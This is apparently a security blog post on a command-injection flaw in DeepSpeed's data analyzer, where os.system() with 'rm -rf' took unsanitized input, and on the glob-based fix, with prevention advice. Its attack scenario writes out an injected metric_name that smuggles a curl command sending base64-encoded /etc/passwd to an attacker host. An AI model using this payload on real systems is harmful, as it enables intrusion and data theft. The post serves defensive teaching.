Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix
Introduction
Machine learning infrastructure is not immune to classic security vulnerabilities. In fact, as ML frameworks grow in complexity and adoption, they become increasingly attractive targets — and increasingly likely to carry the same security pitfalls found in any large software project. This post examines a critical command injection vulnerability discovered and patched in DeepSpeed, Microsoft's popular deep learning optimization library used by organizations training large-scale models worldwide.
The vulnerability lived in a single line of Python code. One call to os.system(). One unsanitized variable. And the potential for full arbitrary command execution on any machine running the affected data pipeline.
If you write Python code that touches the filesystem, spawns subprocesses, or processes user-supplied paths — this one is for you.
The Vulnerability Explained
What Went Wrong
Inside deepspeed/runtime/data_pipeline/data_sampling/data_analyzer.py, the init_metric_results method needed to clean up old metric files before creating new ones. The original implementation did this:
# VULNERABLE CODE — DO NOT USE
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")
At first glance, this looks like a harmless cleanup routine. But there are two deeply problematic choices here working together:
- os.system() invokes a shell interpreter (/bin/sh on Unix). This means the entire string is passed to the shell, which will happily interpret metacharacters like ;, |, &&, `, $(), and &.
- metric_to_sample_fname is derived from user-supplied input, specifically from dataset configuration values or file paths provided at runtime. There is no sanitization, escaping, or validation of this value before it is embedded in the shell command string.
How Could It Be Exploited?
The attack surface opens wherever a user or an external system can influence the metric_save_path or metric_name values passed into the data pipeline. In practice, these values often come from:
- Dataset configuration files (YAML/JSON)
- Command-line arguments
- Programmatic API calls from orchestration systems
- Shared storage paths in multi-tenant training environments
An attacker who controls either of these values can craft a payload that breaks out of the intended rm -rf command and executes arbitrary shell instructions.
Attack Scenario
Imagine a multi-tenant ML platform where users submit training jobs with their own dataset configurations. A malicious user submits the following as their metric_name:
foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar
With metric_save_path set to /data/metrics, the resulting shell command becomes:
rm -rf /data/metrics/foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar_metric_to_sample*
The shell executes all three commands in sequence:
1. ✅ Runs the rm -rf cleanup, now against the truncated path /data/metrics/foo
2. 🚨 Exfiltrates /etc/passwd to an attacker-controlled server
3. 🚨 Runs the trailing echo, a slot where the attacker can place any additional payload
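To see how the payload ends up in the command, it can help to rebuild the string without executing anything. The sketch below mirrors the vulnerable f-strings; build_cleanup_command is a hypothetical helper written for this illustration (not a DeepSpeed function), the payload is a harmless echo, and splitting on ";" is only a rough stand-in for how a shell separates commands.

```python
def build_cleanup_command(metric_save_path: str, metric_name: str) -> str:
    """Rebuild the string the vulnerable code would hand to os.system().

    Hypothetical helper for illustration only; nothing is executed here.
    """
    metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
    return f"rm -rf {metric_to_sample_fname}*"


benign = build_cleanup_command("/data/metrics", "seqlen")
hostile = build_cleanup_command("/data/metrics", "foo; echo INJECTED; echo bar")

print(benign)
print(hostile)

# An unquoted ';' ends one shell command and starts the next.
# (Naive split: a real shell also honors quoting and escaping.)
hostile_commands = [part.strip() for part in hostile.split(";")]
print(hostile_commands)
```

The benign name yields one command; the hostile name yields three, with the intended suffix and wildcard attached to the last one.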
In a cloud training environment, this could mean:
- Credential theft — reading cloud provider credentials from ~/.aws/credentials or instance metadata endpoints
- Data exfiltration — stealing training datasets, model weights, or proprietary code
- Lateral movement — using the compromised node as a pivot point into internal networks
- Denial of service — destroying training checkpoints or corrupting datasets
Even without a fully adversarial scenario, an accidentally malformed path containing spaces or special characters could cause silent failures or unintended file deletions, and rm -rf makes any such mistake potentially catastrophic.
Why os.system() Is Dangerous
The Python documentation itself recommends the subprocess module over os.system(). When you pass a string to os.system() on Unix, you are essentially doing this:
/bin/sh -c "<your string here>"
The shell is a powerful interpreter. Its job is to find and execute commands, expand variables, and evaluate expressions. That power is exactly what makes it dangerous when you feed it untrusted data.
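A harmless way to watch the shell interpret data as code is to swap rm for echo. This is a minimal sketch that assumes a POSIX system, where subprocess.run(..., shell=True) hands the string to /bin/sh -c much as os.system() does; the payload value is made up for the demonstration.

```python
import subprocess

# "Untrusted" input containing a command separator.
payload = "hello; echo INJECTED"

# shell=True on POSIX runs /bin/sh -c "<string>", so ';' splits commands.
result = subprocess.run(
    f"echo {payload}",
    shell=True,
    capture_output=True,
    text=True,
    check=True,
)

shell_output_lines = result.stdout.splitlines()
print(shell_output_lines)
```

The single echo the programmer wrote becomes two commands, so the output has two lines instead of one.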
This vulnerability class is well-documented:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- OWASP A03:2021: Injection
- CVSS Base Score: Often 9.0+ (Critical) when untrusted, remotely supplied input reaches os.system() without sanitization; the exact score depends on the attack vector and the privileges required
The Fix
What Changed
The fix is elegant in its simplicity: eliminate the shell entirely. Instead of asking a shell to delete files, use Python's own filesystem APIs, which operate directly on file paths without any shell interpretation.
Before (Vulnerable):
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")
After (Fixed):
import glob
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
    os.remove(_f)
Why This Fix Works
Let's break down each component of the fix:
1. glob.escape() — Neutralizing Special Characters
glob.escape(metric_to_sample_fname)
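glob.escape() escapes the special glob characters *, ?, and [ in the input string (a closing ] needs no escaping once its opening [ is neutralized). This ensures that if metric_to_sample_fname contains any characters that glob would normally treat as wildcards or special tokens, they are treated as literal characters instead.
This is the path sanitization that was entirely absent in the original code. Note that it protects glob matching only; the shell injection risk disappears because no shell is invoked at all.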
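The effect of glob.escape() is easiest to see by printing its output. In this small sketch the path is invented for illustration, and fnmatch (which implements the same wildcard syntax) is used to check what the escaped pattern matches.

```python
import fnmatch
import glob

# A made-up prefix containing glob metacharacters.
raw_prefix = "/data/metrics/run[1]/loss*_metric_to_sample"
escaped_prefix = glob.escape(raw_prefix)
print(escaped_prefix)

# Escape the untrusted part, then append the one wildcard we actually want.
name_pattern = glob.escape("loss*_metric_to_sample") + "*"

# The '*' from the input now only matches a literal asterisk.
literal_star = fnmatch.fnmatchcase("loss*_metric_to_sample_0", name_pattern)
wildcard_use = fnmatch.fnmatchcase("lossXYZ_metric_to_sample_0", name_pattern)
print(literal_star, wildcard_use)
```

Each special character is wrapped in brackets so that it matches only itself, while the trailing * added afterwards keeps its wildcard meaning.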
2. glob.glob() — Safe Pattern Expansion
glob.glob(f"{glob.escape(metric_to_sample_fname)}*")
The glob.glob() function expands the file pattern and returns a list of matching file paths. Critically:
- It never invokes a shell
- It operates purely in Python's filesystem layer
- It returns concrete, resolved file paths — no further interpretation occurs
The trailing * (outside the escaped portion) is intentional: it matches files like metric_to_sample_0, metric_to_sample_1, etc., which is the original intent of the cleanup.
3. os.remove() — Direct File Deletion
os.remove(_f)
os.remove() deletes a single file by path. It makes a direct syscall — no shell, no string interpolation, no command parsing. Each file returned by glob.glob() is deleted individually and safely.
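Putting the three pieces together, the patched loop can be exercised in a throwaway directory. The wrapper name remove_metric_files and the file names below are hypothetical, chosen only for this sketch; the loop body follows the fixed code shown above.

```python
import glob
import os
import tempfile


def remove_metric_files(metric_save_path: str, metric_name: str) -> list:
    """Delete files whose names start with '<metric_name>_metric_to_sample'.

    Hypothetical wrapper around the patched loop; returns the removed paths.
    """
    metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
    removed = []
    for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
        os.remove(_f)
        removed.append(_f)
    return removed


with tempfile.TemporaryDirectory() as save_path:
    for name in ("seqlen_metric_to_sample_0", "seqlen_metric_to_sample_1", "keep.txt"):
        with open(os.path.join(save_path, name), "w") as fh:
            fh.write("x")

    removed = remove_metric_files(save_path, "seqlen")
    remaining = sorted(os.listdir(save_path))

    # A hostile name is now just an odd filename prefix; nothing matches it.
    removed_hostile = remove_metric_files(save_path, "foo; echo INJECTED; echo bar")
    remaining_after_hostile = sorted(os.listdir(save_path))

print(len(removed), remaining, removed_hostile)
```

The legitimate call removes the two metric files and leaves keep.txt alone; the hostile name matches nothing and runs nothing.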
The Security Improvement at a Glance
| Property | Before (os.system) | After (glob + os.remove) |
|---|---|---|
| Shell invoked? | ✅ Yes | ❌ No |
| Input sanitized? | ❌ No | ✅ Yes (glob.escape) |
| Metachar risk? | 🚨 Critical | ✅ None |
| Behavior on bad input | Arbitrary execution | Safe failure / no match |
| Intent preserved? | ✅ Yes | ✅ Yes |
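The fix is intended as a zero-functionality-change security improvement: the code still cleans up old metric files, but now without any possibility of shell injection. The one behavioral difference is that os.remove() handles files only and raises an error on a directory, which rm -rf would have deleted recursively.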
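Where the matched paths might include directories (which os.remove() refuses to delete), a variant along the following lines would stay closer to what rm -rf did. This is a sketch under that assumption and not part of the actual patch; remove_matches is a hypothetical name.

```python
import glob
import os
import shutil
import tempfile


def remove_matches(prefix: str) -> None:
    """Remove every file or directory whose path starts with `prefix`."""
    for path in glob.glob(f"{glob.escape(prefix)}*"):
        if os.path.isdir(path) and not os.path.islink(path):
            shutil.rmtree(path)  # real directory: remove recursively
        else:
            os.remove(path)      # regular file or symlink


with tempfile.TemporaryDirectory() as root:
    prefix = os.path.join(root, "loss_metric_to_sample")
    open(prefix + "_0", "w").close()                    # matching file
    os.makedirs(os.path.join(prefix + "_dir", "nested"))  # matching directory
    open(os.path.join(root, "unrelated"), "w").close()  # must survive

    remove_matches(prefix)
    left = sorted(os.listdir(root))

print(left)
```

Symlinks are unlinked rather than followed, so the cleanup cannot be redirected into deleting the contents of some other directory.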
Prevention & Best Practices
This vulnerability follows a pattern that appears regularly in Python codebases. Here's how to prevent it and detect it in your own projects.
1. Never Use os.system() with Variable Input
The rule is simple: if the string passed to os.system() contains any variable, it is potentially dangerous. Even variables you believe are safe can be influenced by upstream inputs you haven't considered.
import glob
import os
# ❌ Always dangerous
os.system(f"rm -rf {some_path}*")
os.system("ls " + user_input)
# ✅ Use Python's filesystem APIs instead
for f in glob.glob(f"{glob.escape(some_path)}*"):
    os.remove(f)
2. Prefer subprocess with List Arguments When You Must Spawn Processes
If you genuinely need to run an external command, use subprocess with a list of arguments (not a shell string) and shell=False (the default):
import subprocess
# ❌ Still vulnerable: shell=True defeats the purpose
subprocess.run(f"rm -rf {path}*", shell=True)
# ✅ Safe: no shell, arguments passed directly to execve
# ("--" stops rm from parsing a path that starts with "-" as an option)
subprocess.run(["rm", "-rf", "--", path], shell=False)
When arguments are passed as a list, they go directly to the OS execve syscall. The shell is never involved, so metacharacters are never interpreted.
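The difference is easy to verify: with a list of arguments, a value full of metacharacters reaches the child process as one literal string. In this sketch the child is simply the current Python interpreter echoing back its first argument, so it does not depend on any external command; the payload is made up.

```python
import subprocess
import sys

# "Untrusted" input containing a command separator.
payload = "report.txt; echo INJECTED"

# The child is this same Python interpreter, printing its first argument.
child_code = "import sys; print(sys.argv[1])"
result = subprocess.run(
    [sys.executable, "-c", child_code, payload],
    capture_output=True,
    text=True,
    check=True,
)

received = result.stdout.rstrip("\n")
print(repr(received))
```

The child receives the payload unchanged, semicolon included, because no shell ever parsed it.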
3. Use glob.escape() Whenever Building Glob Patterns from External Input
import glob
# ❌ User input could contain *, ?, [, ]
pattern = f"{user_supplied_path}/*.log"
# ✅ Escape the user-supplied portion
pattern = f"{glob.escape(user_supplied_path)}/*.log"
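Escaping matters for correctness as well as safety. The following sketch, using a temporary directory and an invented directory name, shows an unescaped pattern silently missing files that the escaped pattern finds.

```python
import glob
import os
import tempfile

with tempfile.TemporaryDirectory() as root:
    # A directory name that happens to contain glob metacharacters.
    user_supplied_path = os.path.join(root, "logs[2024]")
    os.makedirs(user_supplied_path)
    open(os.path.join(user_supplied_path, "train.log"), "w").close()

    # Unescaped: "[2024]" is read as a character class, not literal text.
    unescaped = glob.glob(f"{user_supplied_path}/*.log")
    # Escaped: the brackets are matched literally.
    escaped = glob.glob(f"{glob.escape(user_supplied_path)}/*.log")

    unescaped_names = [os.path.basename(p) for p in unescaped]
    escaped_names = [os.path.basename(p) for p in escaped]

print(unescaped_names, escaped_names)
```

Without escaping, the pattern looks for directories named logs2, logs0, or logs4 and finds nothing; with escaping it finds train.log.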
4. Prefer Python-Native APIs Over Shell Commands
For common filesystem operations, Python's standard library has you covered without ever needing a shell:
| Shell Command | Python Equivalent |
|---|---|
| rm -rf path | shutil.rmtree(path) |
| rm file | os.remove(file) |
| rm file* | glob.glob() + os.remove() |
| cp src dst | shutil.copy2(src, dst) |
| mv src dst | shutil.move(src, dst) |
| mkdir -p path | os.makedirs(path, exist_ok=True) |
| ls path | os.listdir(path) |
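As a quick tour, the equivalents in the table can be run end to end inside a temporary directory. The file and directory names here are arbitrary placeholders.

```python
import os
import shutil
import tempfile

with tempfile.TemporaryDirectory() as root:
    work = os.path.join(root, "a", "b")
    os.makedirs(work, exist_ok=True)           # mkdir -p path

    src = os.path.join(work, "src.txt")
    with open(src, "w") as fh:
        fh.write("data")

    copy = os.path.join(work, "copy.txt")
    shutil.copy2(src, copy)                    # cp src dst

    moved = os.path.join(work, "moved.txt")
    shutil.move(copy, moved)                   # mv src dst

    listing_before = sorted(os.listdir(work))  # ls path

    os.remove(src)                             # rm file
    listing_after = sorted(os.listdir(work))

    shutil.rmtree(os.path.join(root, "a"))     # rm -rf path
    top_level = os.listdir(root)

print(listing_before, listing_after, top_level)
```

None of these calls builds a command string, so there is nothing for a shell to misinterpret.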
5. Validate and Sanitize File Paths
When file paths originate from user input, configuration files, or external systems, validate them before use:
import os
import re
def safe_metric_path(base_dir: str, metric_name: str) -> str:
    # Allow only alphanumeric characters, hyphens, and underscores.
    # fullmatch() rejects a trailing newline, which '$' would let through.
    if not re.fullmatch(r'[a-zA-Z0-9_\-]+', metric_name):
        raise ValueError(f"Invalid metric name: {metric_name!r}")
    # Resolve and confirm the path stays within the expected directory.
    # commonpath() compares whole components, unlike a string prefix check.
    base_real = os.path.realpath(base_dir)
    full_path = os.path.realpath(os.path.join(base_real, metric_name))
    if os.path.commonpath([base_real, full_path]) != base_real:
        raise ValueError("Path traversal detected")
    return full_path
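Two details in this kind of validation are easy to get subtly wrong: in Python's re module, $ also matches just before a trailing newline, and a plain string-prefix comparison accepts sibling directories that merely share a prefix. The sketch below demonstrates both, with re.fullmatch and os.path.commonpath as stricter alternatives; is_within and the directory names are hypothetical.

```python
import os
import re
import tempfile

NAME_RE = r"[a-zA-Z0-9_\-]+"

# '$' also matches just before a trailing newline, so this is accepted:
dollar_accepts_newline = re.match(r"^[a-zA-Z0-9_\-]+$", "loss\n") is not None
# re.fullmatch requires the entire string to match:
fullmatch_accepts_newline = re.fullmatch(NAME_RE, "loss\n") is not None


def is_within(base_dir: str, candidate: str) -> bool:
    """Return True if `candidate` resolves to `base_dir` or a path below it."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base


with tempfile.TemporaryDirectory() as root:
    base = os.path.join(root, "metrics")
    sibling = os.path.join(root, "metrics-evil", "x")
    child = os.path.join(root, "metrics", "loss")

    # A sibling directory shares the string prefix but is not inside base.
    prefix_check = os.path.realpath(sibling).startswith(os.path.realpath(base))
    component_check = is_within(base, sibling)
    inside_check = is_within(base, child)

print(dollar_accepts_newline, fullmatch_accepts_newline)
print(prefix_check, component_check, inside_check)
```

The prefix comparison wrongly accepts metrics-evil, while the component-wise comparison rejects it and still accepts a genuine child path.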
6. Static Analysis Tools
Several tools can automatically detect os.system() calls and other dangerous patterns in Python code:
- Bandit: Python-specific security linter. The B605 rule flags os.system() calls directly.
    bandit -r your_project/ -t B605,B607
- Semgrep: Powerful pattern-matching tool with rules for command injection.
- CodeQL: GitHub's semantic code analysis engine with taint-tracking for injection vulnerabilities.
- OrbisAI Security: AI-powered scanner that detected this exact vulnerability automatically.
Adding these tools to your CI/CD pipeline means vulnerabilities like this one are caught before they ever reach production.
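To give a feel for what such a check looks like, here is a toy detector built on Python's ast module. It is only an illustration of the idea, not how Bandit, Semgrep, or CodeQL are implemented; find_os_system_calls is a hypothetical name, and the check misses aliases such as from os import system.

```python
import ast

SOURCE = '''
import os
import subprocess

os.system(f"rm -rf {path}*")
subprocess.run(["rm", "-rf", path])
os.remove(path)
'''


def find_os_system_calls(source: str) -> list:
    """Return the line numbers of direct `os.system(...)` calls in `source`."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == "system"
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "os"
        ):
            hits.append(node.lineno)
    return sorted(hits)


findings = find_os_system_calls(SOURCE)
print(findings)
```

Only the os.system() call is reported; the subprocess.run() list form and os.remove() pass. Real tools go further by tracking aliases and data flow.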
7. Security Standards References
- CWE-78: OS Command Injection
- OWASP Injection (A03:2021): The third most critical web application security risk
- OWASP Command Injection: Detailed attack patterns and mitigations
- Python Security Best Practices: Official Python docs on subprocess security
Conclusion
A single call to os.system() with an unsanitized variable is all it takes to turn a routine file cleanup into a critical security vulnerability. The lesson here isn't that the original developer was careless — it's that certain APIs are inherently dangerous when combined with variable input, and developers need to internalize which APIs those are.
The fix demonstrates something important: the most secure code is often the simplest code. Replacing a shell command with native Python filesystem operations didn't require complex cryptography, elaborate input validation, or architectural changes. It required recognizing that the shell was never necessary in the first place, and removing it entirely.
Key takeaways:
- 🚫 Avoid os.system(): it invokes a shell, and shells interpret metacharacters
- ✅ Use Python-native filesystem APIs (os.remove(), shutil, pathlib) for file operations
- 🔒 Use glob.escape() when building glob patterns from external input
- 🔍 Run Bandit or Semgrep in your CI pipeline to catch these patterns automatically
- 📋 Treat all external input as untrusted, including configuration files and dataset paths
Security vulnerabilities in ML infrastructure carry the same risks as vulnerabilities anywhere else — and sometimes higher, given the sensitive datasets and credentials that training environments typically handle. Secure coding practices aren't just for web applications. They belong in every line of code you ship.
This vulnerability was automatically detected and patched by OrbisAI Security. Automated security scanning helps catch issues like this before they reach production.